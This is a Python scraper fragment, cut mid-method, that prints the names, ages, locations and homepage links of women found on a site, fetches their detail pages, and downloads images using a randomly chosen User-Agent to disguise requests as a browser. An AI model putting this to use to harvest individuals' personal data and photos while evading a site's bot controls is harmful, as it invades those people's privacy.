        # the original used py2 `print u'...'` statements, which are
        # syntax errors on Python 3
        print(u'发现一位MM 名字叫%s 年龄%s 坐标%s' % (item[2], item[3], item[4]))
        print(u'%s的个人主页是 %s' % (item[2], item[1]))
        print(u'继续获取详情页面数据...')
        detailPage = item[1]
        name = item[2]
        self.getDetailPage(detailPage, name, begin_time)
def getImage(url):
    """Fetch an image over HTTP and return it as an OpenCV-style array.

    :param url: image URL
    :return: numpy uint8 array with channels ordered B, G, R
    """
    req = ulb.Request(url)
    # disguise the request as a regular browser with a random User-Agent
    req.add_header('User-Agent', random.choice(my_headers))
    stream = ulb.urlopen(req)
    parser = ImageFile.Parser()
    # feed the parser incrementally until the stream is exhausted
    while True:
        buf = stream.read(1024)
        if not buf:
            break
        parser.feed(buf)
    img = parser.close()
    # convert the image to a numpy matrix
    rgb = np.array(img)
    # swap the RGB channels to BGR for OpenCV-style display
    bgr = np.zeros(rgb.shape, np.uint8)
    bgr[:, :, 0] = rgb[:, :, 2]
    bgr[:, :, 1] = rgb[:, :, 1]
    bgr[:, :, 2] = rgb[:, :, 0]
    return bgr